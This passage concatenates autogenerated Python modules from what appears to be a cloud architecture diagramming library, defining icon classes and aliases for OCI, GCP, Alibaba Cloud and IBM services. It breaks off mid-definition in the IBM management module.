import _OCI class _Storage(_OCI): _type = "storage" _icon_dir = "resources/oci/storage" class BackupRestoreWhite(_Storage): _icon = "backup-restore-white.png" class BackupRestore(_Storage): _icon = "backup-restore.png" class BlockStorageCloneWhite(_Storage): _icon = "block-storage-clone-white.png" class BlockStorageClone(_Storage): _icon = "block-storage-clone.png" class BlockStorageWhite(_Storage): _icon = "block-storage-white.png" class BlockStorage(_Storage): _icon = "block-storage.png" class BucketsWhite(_Storage): _icon = "buckets-white.png" class Buckets(_Storage): _icon = "buckets.png" class DataTransferWhite(_Storage): _icon = "data-transfer-white.png" class DataTransfer(_Storage): _icon = "data-transfer.png" class ElasticPerformanceWhite(_Storage): _icon = "elastic-performance-white.png" class ElasticPerformance(_Storage): _icon = "elastic-performance.png" class FileStorageWhite(_Storage): _icon = "file-storage-white.png" class FileStorage(_Storage): _icon = "file-storage.png" class ObjectStorageWhite(_Storage): _icon = "object-storage-white.png" class ObjectStorage(_Storage): _icon = "object-storage.png" class StorageGatewayWhite(_Storage): _icon = "storage-gateway-white.png" class StorageGateway(_Storage): _icon = "storage-gateway.png" # Aliases File: diagrams/oci/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Network(_OCI): _type = "network" _icon_dir = "resources/oci/network" class DrgWhite(_Network): _icon = "drg-white.png" class Drg(_Network): _icon = "drg.png" class FirewallWhite(_Network): _icon = "firewall-white.png" class Firewall(_Network): _icon = "firewall.png" class InternetGatewayWhite(_Network): _icon = "internet-gateway-white.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class LoadBalancerWhite(_Network): _icon = "load-balancer-white.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class RouteTableWhite(_Network): _icon = "route-table-white.png" class RouteTable(_Network): _icon = "route-table.png" class SecurityListsWhite(_Network): _icon = "security-lists-white.png" class SecurityLists(_Network): _icon = "security-lists.png" class ServiceGatewayWhite(_Network): _icon = "service-gateway-white.png" class ServiceGateway(_Network): _icon = "service-gateway.png" class VcnWhite(_Network): _icon = "vcn-white.png" class Vcn(_Network): _icon = "vcn.png" # Aliases File: diagrams/oci/governance.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Governance(_OCI): _type = "governance" _icon_dir = "resources/oci/governance" class AuditWhite(_Governance): _icon = "audit-white.png" class Audit(_Governance): _icon = "audit.png" class CompartmentsWhite(_Governance): _icon = "compartments-white.png" class Compartments(_Governance): _icon = "compartments.png" class GroupsWhite(_Governance): _icon = "groups-white.png" class Groups(_Governance): _icon = "groups.png" class LoggingWhite(_Governance): _icon = "logging-white.png" class Logging(_Governance): _icon = "logging.png" class OCIDWhite(_Governance): _icon = "ocid-white.png" class OCID(_Governance): _icon = "ocid.png" class PoliciesWhite(_Governance): _icon = "policies-white.png" class Policies(_Governance): _icon = "policies.png" class TaggingWhite(_Governance): _icon = "tagging-white.png" class Tagging(_Governance): _icon = "tagging.png" # Aliases File: diagrams/oci/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OCI class _Compute(_OCI): _type = "compute" _icon_dir = "resources/oci/compute" class AutoscaleWhite(_Compute): _icon = "autoscale-white.png" class Autoscale(_Compute): _icon = "autoscale.png" class BMWhite(_Compute): _icon = "bm-white.png" class BM(_Compute): _icon = "bm.png" class ContainerWhite(_Compute): _icon = "container-white.png" class Container(_Compute): _icon = "container.png" class FunctionsWhite(_Compute): _icon = "functions-white.png" class Functions(_Compute): _icon = "functions.png" class InstancePoolsWhite(_Compute): _icon = "instance-pools-white.png" class InstancePools(_Compute): _icon = "instance-pools.png" class OCIRWhite(_Compute): _icon = "ocir-white.png" class OCIR(_Compute): _icon = "ocir.png" class OKEWhite(_Compute): _icon = "oke-white.png" class OKE(_Compute): _icon = "oke.png" class VMWhite(_Compute): _icon = "vm-white.png" class VM(_Compute): _icon = "vm.png" # Aliases VirtualMachine = VM VirtualMachineWhite = VMWhite BareMetal = BM BareMetalWhite = BMWhite OCIRegistry = OCIR OCIRegistryWhite = OCIRWhite ContainerEngine = OKE ContainerEngineWhite = OKEWhite File: diagrams/gcp/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Database(_GCP): _type = "database" _icon_dir = "resources/gcp/database" class Bigtable(_Database): _icon = "bigtable.png" class Datastore(_Database): _icon = "datastore.png" class Firestore(_Database): _icon = "firestore.png" class Memorystore(_Database): _icon = "memorystore.png" class Spanner(_Database): _icon = "spanner.png" class SQL(_Database): _icon = "sql.png" # Aliases BigTable = Bigtable File: diagrams/gcp/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Security(_GCP): _type = "security" _icon_dir = "resources/gcp/security" class Iam(_Security): _icon = "iam.png" class IAP(_Security): _icon = "iap.png" class KeyManagementService(_Security): _icon = "key-management-service.png" class ResourceManager(_Security): _icon = "resource-manager.png" class SecurityCommandCenter(_Security): _icon = "security-command-center.png" class SecurityScanner(_Security): _icon = "security-scanner.png" # Aliases KMS = KeyManagementService SCC = SecurityCommandCenter File: diagrams/gcp/__init__.py """ GCP provides a set of services for Google Cloud Platform provider. """ from diagrams import Node class _GCP(Node): _provider = "gcp" _icon_dir = "resources/gcp" fontcolor = "#2d3436" File: diagrams/gcp/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _GCP class _ML(_GCP): _type = "ml" _icon_dir = "resources/gcp/ml" class AdvancedSolutionsLab(_ML): _icon = "advanced-solutions-lab.png" class AIHub(_ML): _icon = "ai-hub.png" class AIPlatformDataLabelingService(_ML): _icon = "ai-platform-data-labeling-service.png" class AIPlatform(_ML): _icon = "ai-platform.png" class AutomlNaturalLanguage(_ML): _icon = "automl-natural-language.png" class AutomlTables(_ML): _icon = "automl-tables.png" class AutomlTranslation(_ML): _icon = "automl-translation.png" class AutomlVideoIntelligence(_ML): _icon = "automl-video-intelligence.png" class AutomlVision(_ML): _icon = "automl-vision.png" class Automl(_ML): _icon = "automl.png" class DialogFlowEnterpriseEdition(_ML): _icon = "dialog-flow-enterprise-edition.png" class InferenceAPI(_ML): _icon = "inference-api.png" class JobsAPI(_ML): _icon = "jobs-api.png" class NaturalLanguageAPI(_ML): _icon = "natural-language-api.png" class RecommendationsAI(_ML): _icon = "recommendations-ai.png" class SpeechToText(_ML): _icon = "speech-to-text.png" class TextToSpeech(_ML): _icon = "text-to-speech.png" class TPU(_ML): _icon = "tpu.png" class TranslationAPI(_ML): _icon = "translation-api.png" class VideoIntelligenceAPI(_ML): _icon = "video-intelligence-api.png" class VisionAPI(_ML): _icon = "vision-api.png" # Aliases AutoML = Automl NLAPI = NaturalLanguageAPI STT = SpeechToText TTS = TextToSpeech File: diagrams/gcp/api.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _API(_GCP): _type = "api" _icon_dir = "resources/gcp/api" class APIGateway(_API): _icon = "api-gateway.png" class Apigee(_API): _icon = "apigee.png" class Endpoints(_API): _icon = "endpoints.png" # Aliases File: diagrams/gcp/operations.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Operations(_GCP): _type = "operations" _icon_dir = "resources/gcp/operations" class Logging(_Operations): _icon = "logging.png" class Monitoring(_Operations): _icon = "monitoring.png" # Aliases File: diagrams/gcp/devtools.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Devtools(_GCP): _type = "devtools" _icon_dir = "resources/gcp/devtools" class Build(_Devtools): _icon = "build.png" class CodeForIntellij(_Devtools): _icon = "code-for-intellij.png" class Code(_Devtools): _icon = "code.png" class ContainerRegistry(_Devtools): _icon = "container-registry.png" class GradleAppEnginePlugin(_Devtools): _icon = "gradle-app-engine-plugin.png" class IdePlugins(_Devtools): _icon = "ide-plugins.png" class MavenAppEnginePlugin(_Devtools): _icon = "maven-app-engine-plugin.png" class Scheduler(_Devtools): _icon = "scheduler.png" class SDK(_Devtools): _icon = "sdk.png" class SourceRepositories(_Devtools): _icon = "source-repositories.png" class Tasks(_Devtools): _icon = "tasks.png" class TestLab(_Devtools): _icon = "test-lab.png" class ToolsForEclipse(_Devtools): _icon = "tools-for-eclipse.png" class ToolsForPowershell(_Devtools): _icon = "tools-for-powershell.png" class ToolsForVisualStudio(_Devtools): _icon = "tools-for-visual-studio.png" # Aliases GCR = ContainerRegistry File: diagrams/gcp/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _GCP class _Storage(_GCP): _type = "storage" _icon_dir = "resources/gcp/storage" class Filestore(_Storage): _icon = "filestore.png" class PersistentDisk(_Storage): _icon = "persistent-disk.png" class Storage(_Storage): _icon = "storage.png" # Aliases GCS = Storage File: diagrams/gcp/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Network(_GCP): _type = "network" _icon_dir = "resources/gcp/network" class Armor(_Network): _icon = "armor.png" class CDN(_Network): _icon = "cdn.png" class DedicatedInterconnect(_Network): _icon = "dedicated-interconnect.png" class DNS(_Network): _icon = "dns.png" class ExternalIpAddresses(_Network): _icon = "external-ip-addresses.png" class FirewallRules(_Network): _icon = "firewall-rules.png" class LoadBalancing(_Network): _icon = "load-balancing.png" class NAT(_Network): _icon = "nat.png" class Network(_Network): _icon = "network.png" class PartnerInterconnect(_Network): _icon = "partner-interconnect.png" class PremiumNetworkTier(_Network): _icon = "premium-network-tier.png" class Router(_Network): _icon = "router.png" class Routes(_Network): _icon = "routes.png" class StandardNetworkTier(_Network): _icon = "standard-network-tier.png" class TrafficDirector(_Network): _icon = "traffic-director.png" class VirtualPrivateCloud(_Network): _icon = "virtual-private-cloud.png" class VPN(_Network): _icon = "vpn.png" # Aliases VPC = VirtualPrivateCloud File: diagrams/gcp/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Analytics(_GCP): _type = "analytics" _icon_dir = "resources/gcp/analytics" class Bigquery(_Analytics): _icon = "bigquery.png" class Composer(_Analytics): _icon = "composer.png" class DataCatalog(_Analytics): _icon = "data-catalog.png" class DataFusion(_Analytics): _icon = "data-fusion.png" class Dataflow(_Analytics): _icon = "dataflow.png" class Datalab(_Analytics): _icon = "datalab.png" class Dataprep(_Analytics): _icon = "dataprep.png" class Dataproc(_Analytics): _icon = "dataproc.png" class Genomics(_Analytics): _icon = "genomics.png" class Pubsub(_Analytics): _icon = "pubsub.png" # Aliases BigQuery = Bigquery PubSub = Pubsub File: diagrams/gcp/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Migration(_GCP): _type = "migration" _icon_dir = "resources/gcp/migration" class TransferAppliance(_Migration): _icon = "transfer-appliance.png" # Aliases File: diagrams/gcp/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Iot(_GCP): _type = "iot" _icon_dir = "resources/gcp/iot" class IotCore(_Iot): _icon = "iot-core.png" # Aliases File: diagrams/gcp/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Compute(_GCP): _type = "compute" _icon_dir = "resources/gcp/compute" class AppEngine(_Compute): _icon = "app-engine.png" class ComputeEngine(_Compute): _icon = "compute-engine.png" class ContainerOptimizedOS(_Compute): _icon = "container-optimized-os.png" class Functions(_Compute): _icon = "functions.png" class GKEOnPrem(_Compute): _icon = "gke-on-prem.png" class GPU(_Compute): _icon = "gpu.png" class KubernetesEngine(_Compute): _icon = "kubernetes-engine.png" class Run(_Compute): _icon = "run.png" # Aliases GAE = AppEngine GCF = Functions GCE = ComputeEngine GKE = KubernetesEngine File: diagrams/alibabacloud/web.py # This module is automatically generated by autogen.sh. 
DO NOT EDIT. from . import _AlibabaCloud class _Web(_AlibabaCloud): _type = "web" _icon_dir = "resources/alibabacloud/web" class Dns(_Web): _icon = "dns.png" class Domain(_Web): _icon = "domain.png" # Aliases File: diagrams/alibabacloud/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Database(_AlibabaCloud): _type = "database" _icon_dir = "resources/alibabacloud/database" class ApsaradbCassandra(_Database): _icon = "apsaradb-cassandra.png" class ApsaradbHbase(_Database): _icon = "apsaradb-hbase.png" class ApsaradbMemcache(_Database): _icon = "apsaradb-memcache.png" class ApsaradbMongodb(_Database): _icon = "apsaradb-mongodb.png" class ApsaradbOceanbase(_Database): _icon = "apsaradb-oceanbase.png" class ApsaradbPolardb(_Database): _icon = "apsaradb-polardb.png" class ApsaradbPostgresql(_Database): _icon = "apsaradb-postgresql.png" class ApsaradbPpas(_Database): _icon = "apsaradb-ppas.png" class ApsaradbRedis(_Database): _icon = "apsaradb-redis.png" class ApsaradbSqlserver(_Database): _icon = "apsaradb-sqlserver.png" class DataManagementService(_Database): _icon = "data-management-service.png" class DataTransmissionService(_Database): _icon = "data-transmission-service.png" class DatabaseBackupService(_Database): _icon = "database-backup-service.png" class DisributeRelationalDatabaseService(_Database): _icon = "disribute-relational-database-service.png" class GraphDatabaseService(_Database): _icon = "graph-database-service.png" class HybriddbForMysql(_Database): _icon = "hybriddb-for-mysql.png" class RelationalDatabaseService(_Database): _icon = "relational-database-service.png" # Aliases DMS = DataManagementService DTS = DataTransmissionService DBS = DatabaseBackupService DRDS = DisributeRelationalDatabaseService GDS = GraphDatabaseService RDS = RelationalDatabaseService File: diagrams/alibabacloud/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AlibabaCloud class _Security(_AlibabaCloud): _type = "security" _icon_dir = "resources/alibabacloud/security" class AntiBotService(_Security): _icon = "anti-bot-service.png" class AntiDdosBasic(_Security): _icon = "anti-ddos-basic.png" class AntiDdosPro(_Security): _icon = "anti-ddos-pro.png" class AntifraudService(_Security): _icon = "antifraud-service.png" class BastionHost(_Security): _icon = "bastion-host.png" class CloudFirewall(_Security): _icon = "cloud-firewall.png" class CloudSecurityScanner(_Security): _icon = "cloud-security-scanner.png" class ContentModeration(_Security): _icon = "content-moderation.png" class CrowdsourcedSecurityTesting(_Security): _icon = "crowdsourced-security-testing.png" class DataEncryptionService(_Security): _icon = "data-encryption-service.png" class DbAudit(_Security): _icon = "db-audit.png" class GameShield(_Security): _icon = "game-shield.png" class IdVerification(_Security): _icon = "id-verification.png" class ManagedSecurityService(_Security): _icon = "managed-security-service.png" class SecurityCenter(_Security): _icon = "security-center.png" class ServerGuard(_Security): _icon = "server-guard.png" class SslCertificates(_Security): _icon = "ssl-certificates.png" class WebApplicationFirewall(_Security): _icon = "web-application-firewall.png" # Aliases ABS = AntiBotService AS = AntifraudService CFW = CloudFirewall CM = ContentModeration DES = DataEncryptionService WAF = WebApplicationFirewall File: diagrams/alibabacloud/__init__.py """ AlibabaCloud provides a set of services for Alibaba Cloud provider. """ from diagrams import Node class _AlibabaCloud(Node): _provider = "alibabacloud" _icon_dir = "resources/alibabacloud" fontcolor = "#ffffff" File: diagrams/alibabacloud/application.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Application(_AlibabaCloud): _type = "application" _icon_dir = "resources/alibabacloud/application" class ApiGateway(_Application): _icon = "api-gateway.png" class BeeBot(_Application): _icon = "bee-bot.png" class BlockchainAsAService(_Application): _icon = "blockchain-as-a-service.png" class CloudCallCenter(_Application): _icon = "cloud-call-center.png" class CodePipeline(_Application): _icon = "code-pipeline.png" class DirectMail(_Application): _icon = "direct-mail.png" class LogService(_Application): _icon = "log-service.png" class MessageNotificationService(_Application): _icon = "message-notification-service.png" class NodeJsPerformancePlatform(_Application): _icon = "node-js-performance-platform.png" class OpenSearch(_Application): _icon = "open-search.png" class PerformanceTestingService(_Application): _icon = "performance-testing-service.png" class RdCloud(_Application): _icon = "rd-cloud.png" class SmartConversationAnalysis(_Application): _icon = "smart-conversation-analysis.png" class Yida(_Application): _icon = "yida.png" # Aliases SLS = LogService MNS = MessageNotificationService PTS = PerformanceTestingService SCA = SmartConversationAnalysis File: diagrams/alibabacloud/communication.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Communication(_AlibabaCloud): _type = "communication" _icon_dir = "resources/alibabacloud/communication" class DirectMail(_Communication): _icon = "direct-mail.png" class MobilePush(_Communication): _icon = "mobile-push.png" # Aliases File: diagrams/alibabacloud/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
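# --- Usage sketch (editorial addition, not part of the generated modules) ---
# A small example combining the Alibaba Cloud web, security, application and
# database nodes above. `diagrams.Diagram` and the `>>` operator are assumed
# from the top-level package; labels are illustrative only.
from diagrams import Diagram
from diagrams.alibabacloud.application import SLS, ApiGateway
from diagrams.alibabacloud.database import RDS, ApsaradbRedis
from diagrams.alibabacloud.security import WAF
from diagrams.alibabacloud.web import Dns

with Diagram("alibaba_web_stack", show=False):
    dns = Dns("dns")
    waf = WAF("waf")
    api = ApiGateway("api")
    db = RDS("rds")
    cache = ApsaradbRedis("redis")
    logs = SLS("logs")

    # Traffic passes the WAF before the API layer; the API uses a database,
    # a cache, and ships logs to Log Service.
    dns >> waf >> api >> [db, cache]
    api >> logs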
import _AlibabaCloud class _Storage(_AlibabaCloud): _type = "storage" _icon_dir = "resources/alibabacloud/storage" class CloudStorageGateway(_Storage): _icon = "cloud-storage-gateway.png" class FileStorageHdfs(_Storage): _icon = "file-storage-hdfs.png" class FileStorageNas(_Storage): _icon = "file-storage-nas.png" class HybridBackupRecovery(_Storage): _icon = "hybrid-backup-recovery.png" class HybridCloudDisasterRecovery(_Storage): _icon = "hybrid-cloud-disaster-recovery.png" class Imm(_Storage): _icon = "imm.png" class ObjectStorageService(_Storage): _icon = "object-storage-service.png" class ObjectTableStore(_Storage): _icon = "object-table-store.png" # Aliases HDFS = FileStorageHdfs NAS = FileStorageNas HBR = HybridBackupRecovery HDR = HybridCloudDisasterRecovery OSS = ObjectStorageService OTS = ObjectTableStore File: diagrams/alibabacloud/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Network(_AlibabaCloud): _type = "network" _icon_dir = "resources/alibabacloud/network" class Cdn(_Network): _icon = "cdn.png" class CloudEnterpriseNetwork(_Network): _icon = "cloud-enterprise-network.png" class ElasticIpAddress(_Network): _icon = "elastic-ip-address.png" class ExpressConnect(_Network): _icon = "express-connect.png" class NatGateway(_Network): _icon = "nat-gateway.png" class ServerLoadBalancer(_Network): _icon = "server-load-balancer.png" class SmartAccessGateway(_Network): _icon = "smart-access-gateway.png" class VirtualPrivateCloud(_Network): _icon = "virtual-private-cloud.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" # Aliases CEN = CloudEnterpriseNetwork EIP = ElasticIpAddress SLB = ServerLoadBalancer VPC = VirtualPrivateCloud File: diagrams/alibabacloud/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Analytics(_AlibabaCloud): _type = "analytics" _icon_dir = "resources/alibabacloud/analytics" class AnalyticDb(_Analytics): _icon = "analytic-db.png" class ClickHouse(_Analytics): _icon = "click-house.png" class DataLakeAnalytics(_Analytics): _icon = "data-lake-analytics.png" class ElaticMapReduce(_Analytics): _icon = "elatic-map-reduce.png" class OpenSearch(_Analytics): _icon = "open-search.png" # Aliases File: diagrams/alibabacloud/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Iot(_AlibabaCloud): _type = "iot" _icon_dir = "resources/alibabacloud/iot" class IotInternetDeviceId(_Iot): _icon = "iot-internet-device-id.png" class IotLinkWan(_Iot): _icon = "iot-link-wan.png" class IotMobileConnectionPackage(_Iot): _icon = "iot-mobile-connection-package.png" class IotPlatform(_Iot): _icon = "iot-platform.png" # Aliases File: diagrams/alibabacloud/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AlibabaCloud class _Compute(_AlibabaCloud): _type = "compute" _icon_dir = "resources/alibabacloud/compute" class AutoScaling(_Compute): _icon = "auto-scaling.png" class BatchCompute(_Compute): _icon = "batch-compute.png" class ContainerRegistry(_Compute): _icon = "container-registry.png" class ContainerService(_Compute): _icon = "container-service.png" class ElasticComputeService(_Compute): _icon = "elastic-compute-service.png" class ElasticContainerInstance(_Compute): _icon = "elastic-container-instance.png" class ElasticHighPerformanceComputing(_Compute): _icon = "elastic-high-performance-computing.png" class ElasticSearch(_Compute): _icon = "elastic-search.png" class FunctionCompute(_Compute): _icon = "function-compute.png" class OperationOrchestrationService(_Compute): _icon = "operation-orchestration-service.png" class ResourceOrchestrationService(_Compute): _icon = "resource-orchestration-service.png" class ServerLoadBalancer(_Compute): _icon = "server-load-balancer.png" class ServerlessAppEngine(_Compute): _icon = "serverless-app-engine.png" class SimpleApplicationServer(_Compute): _icon = "simple-application-server.png" class WebAppService(_Compute): _icon = "web-app-service.png" # Aliases ESS = AutoScaling ECS = ElasticComputeService ECI = ElasticContainerInstance EHPC = ElasticHighPerformanceComputing FC = FunctionCompute OOS = OperationOrchestrationService ROS = ResourceOrchestrationService SLB = ServerLoadBalancer SAE = ServerlessAppEngine SAS = SimpleApplicationServer WAS = WebAppService File: diagrams/ibm/user.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _User(_IBM): _type = "user" _icon_dir = "resources/ibm/user" class Browser(_User): _icon = "browser.png" class Device(_User): _icon = "device.png" class IntegratedDigitalExperiences(_User): _icon = "integrated-digital-experiences.png" class PhysicalEntity(_User): _icon = "physical-entity.png" class Sensor(_User): _icon = "sensor.png" class User(_User): _icon = "user.png" # Aliases File: diagrams/ibm/social.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Social(_IBM): _type = "social" _icon_dir = "resources/ibm/social" class Communities(_Social): _icon = "communities.png" class FileSync(_Social): _icon = "file-sync.png" class LiveCollaboration(_Social): _icon = "live-collaboration.png" class Messaging(_Social): _icon = "messaging.png" class Networking(_Social): _icon = "networking.png" # Aliases File: diagrams/ibm/infrastructure.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
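# --- Usage sketch (editorial addition, not part of the generated modules) ---
# A minimal serving topology using the Alibaba Cloud network, compute and
# storage nodes above (Cdn, SLB, ECS, FC, OSS). The `Diagram` context manager
# and node-list edges are assumed from the top-level diagrams package.
from diagrams import Diagram
from diagrams.alibabacloud.compute import ECS, FC
from diagrams.alibabacloud.network import SLB, Cdn
from diagrams.alibabacloud.storage import OSS

with Diagram("alibaba_serving", show=False):
    cdn = Cdn("cdn")
    lb = SLB("slb")
    workers = [ECS("ecs-1"), ECS("ecs-2")]
    assets = OSS("oss")
    thumbs = FC("thumbnailer")

    # CDN fronts the load balancer; workers read and write assets, and a
    # function processes new objects.
    cdn >> lb >> workers >> assets
    assets >> thumbs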
import _IBM class _Infrastructure(_IBM): _type = "infrastructure" _icon_dir = "resources/ibm/infrastructure" class Channels(_Infrastructure): _icon = "channels.png" class CloudMessaging(_Infrastructure): _icon = "cloud-messaging.png" class Dashboard(_Infrastructure): _icon = "dashboard.png" class Diagnostics(_Infrastructure): _icon = "diagnostics.png" class EdgeServices(_Infrastructure): _icon = "edge-services.png" class EnterpriseMessaging(_Infrastructure): _icon = "enterprise-messaging.png" class EventFeed(_Infrastructure): _icon = "event-feed.png" class InfrastructureServices(_Infrastructure): _icon = "infrastructure-services.png" class InterserviceCommunication(_Infrastructure): _icon = "interservice-communication.png" class LoadBalancingRouting(_Infrastructure): _icon = "load-balancing-routing.png" class MicroservicesMesh(_Infrastructure): _icon = "microservices-mesh.png" class MobileBackend(_Infrastructure): _icon = "mobile-backend.png" class MobileProviderNetwork(_Infrastructure): _icon = "mobile-provider-network.png" class MonitoringLogging(_Infrastructure): _icon = "monitoring-logging.png" class Monitoring(_Infrastructure): _icon = "monitoring.png" class PeerServices(_Infrastructure): _icon = "peer-services.png" class ServiceDiscoveryConfiguration(_Infrastructure): _icon = "service-discovery-configuration.png" class TransformationConnectivity(_Infrastructure): _icon = "transformation-connectivity.png" # Aliases File: diagrams/ibm/applications.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Applications(_IBM): _type = "applications" _icon_dir = "resources/ibm/applications" class ActionableInsight(_Applications): _icon = "actionable-insight.png" class Annotate(_Applications): _icon = "annotate.png" class ApiDeveloperPortal(_Applications): _icon = "api-developer-portal.png" class ApiPolyglotRuntimes(_Applications): _icon = "api-polyglot-runtimes.png" class AppServer(_Applications): _icon = "app-server.png" class ApplicationLogic(_Applications): _icon = "application-logic.png" class EnterpriseApplications(_Applications): _icon = "enterprise-applications.png" class Index(_Applications): _icon = "index.png" class IotApplication(_Applications): _icon = "iot-application.png" class Microservice(_Applications): _icon = "microservice.png" class MobileApp(_Applications): _icon = "mobile-app.png" class Ontology(_Applications): _icon = "ontology.png" class OpenSourceTools(_Applications): _icon = "open-source-tools.png" class RuntimeServices(_Applications): _icon = "runtime-services.png" class SaasApplications(_Applications): _icon = "saas-applications.png" class ServiceBroker(_Applications): _icon = "service-broker.png" class SpeechToText(_Applications): _icon = "speech-to-text.png" class VisualRecognition(_Applications): _icon = "visual-recognition.png" class Visualization(_Applications): _icon = "visualization.png" # Aliases File: diagrams/ibm/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _IBM class _Security(_IBM): _type = "security" _icon_dir = "resources/ibm/security" class ApiSecurity(_Security): _icon = "api-security.png" class BlockchainSecurityService(_Security): _icon = "blockchain-security-service.png" class DataSecurity(_Security): _icon = "data-security.png" class Firewall(_Security): _icon = "firewall.png" class Gateway(_Security): _icon = "gateway.png" class GovernanceRiskCompliance(_Security): _icon = "governance-risk-compliance.png" class IdentityAccessManagement(_Security): _icon = "identity-access-management.png" class IdentityProvider(_Security): _icon = "identity-provider.png" class InfrastructureSecurity(_Security): _icon = "infrastructure-security.png" class PhysicalSecurity(_Security): _icon = "physical-security.png" class SecurityMonitoringIntelligence(_Security): _icon = "security-monitoring-intelligence.png" class SecurityServices(_Security): _icon = "security-services.png" class TrustendComputing(_Security): _icon = "trustend-computing.png" class Vpn(_Security): _icon = "vpn.png" # Aliases File: diagrams/ibm/__init__.py """ IBM provides a set of services for IBM Cloud provider. """ from diagrams import Node class _IBM(Node): _provider = "ibm" _icon_dir = "resources/ibm" fontcolor = "#ffffff" File: diagrams/ibm/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Devops(_IBM): _type = "devops" _icon_dir = "resources/ibm/devops" class ArtifactManagement(_Devops): _icon = "artifact-management.png" class BuildTest(_Devops): _icon = "build-test.png" class CodeEditor(_Devops): _icon = "code-editor.png" class CollaborativeDevelopment(_Devops): _icon = "collaborative-development.png" class ConfigurationManagement(_Devops): _icon = "configuration-management.png" class ContinuousDeploy(_Devops): _icon = "continuous-deploy.png" class ContinuousTesting(_Devops): _icon = "continuous-testing.png" class Devops(_Devops): _icon = "devops.png" class Provision(_Devops): _icon = "provision.png" class ReleaseManagement(_Devops): _icon = "release-management.png" # Aliases File: diagrams/ibm/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Storage(_IBM): _type = "storage" _icon_dir = "resources/ibm/storage" class BlockStorage(_Storage): _icon = "block-storage.png" class ObjectStorage(_Storage): _icon = "object-storage.png" # Aliases File: diagrams/ibm/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
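# --- Usage sketch (editorial addition, not part of the generated modules) ---
# An illustrative edge-to-storage flow built from the IBM user,
# infrastructure, applications, security and storage nodes above. The
# `diagrams.Diagram` API and `>>` chaining are assumptions from the top-level
# package, not from these modules.
from diagrams import Diagram
from diagrams.ibm.applications import Microservice
from diagrams.ibm.infrastructure import EdgeServices, LoadBalancingRouting
from diagrams.ibm.security import Firewall
from diagrams.ibm.storage import ObjectStorage
from diagrams.ibm.user import User

with Diagram("ibm_edge_to_storage", show=False):
    user = User("user")
    edge = EdgeServices("edge")
    fw = Firewall("firewall")
    lb = LoadBalancingRouting("routing")
    services = [Microservice("svc-1"), Microservice("svc-2")]
    store = ObjectStorage("objects")

    user >> edge >> fw >> lb >> services >> store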
import _IBM class _Network(_IBM): _type = "network" _icon_dir = "resources/ibm/network" class Bridge(_Network): _icon = "bridge.png" class DirectLink(_Network): _icon = "direct-link.png" class Enterprise(_Network): _icon = "enterprise.png" class Firewall(_Network): _icon = "firewall.png" class FloatingIp(_Network): _icon = "floating-ip.png" class Gateway(_Network): _icon = "gateway.png" class InternetServices(_Network): _icon = "internet-services.png" class LoadBalancerListener(_Network): _icon = "load-balancer-listener.png" class LoadBalancerPool(_Network): _icon = "load-balancer-pool.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class LoadBalancingRouting(_Network): _icon = "load-balancing-routing.png" class PublicGateway(_Network): _icon = "public-gateway.png" class Region(_Network): _icon = "region.png" class Router(_Network): _icon = "router.png" class Rules(_Network): _icon = "rules.png" class Subnet(_Network): _icon = "subnet.png" class TransitGateway(_Network): _icon = "transit-gateway.png" class Vpc(_Network): _icon = "vpc.png" class VpnConnection(_Network): _icon = "vpn-connection.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" class VpnPolicy(_Network): _icon = "vpn-policy.png" # Aliases File: diagrams/ibm/management.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Management(_IBM): _type = "management" _icon_dir = "resources/ibm/management" class AlertNotification(_Management): _icon = "alert-notification.png" class ApiManagement(_Management): _icon = "api-management.png" class CloudManagement(_Management): _icon = "cloud-management.png" class ClusterManagement(_Management): _icon = "cluster-management.png" class ContentManagement(_Management): _icon = "content-management.png" class DataServices(_Management): _icon = "data-services.png" class DeviceManagement(_Management): _icon = "device-management.png" class InformationGovernance(_Management): _icon = "information-governance.png" class ItServiceManagement(_Management): _icon = "it-service-management.png" class Management(_Management): _icon = "management.png" class MonitoringMetrics(_Management): _icon = "monitoring-metrics.png" class ProcessManagement(_Management): _icon = "process-management.png" class 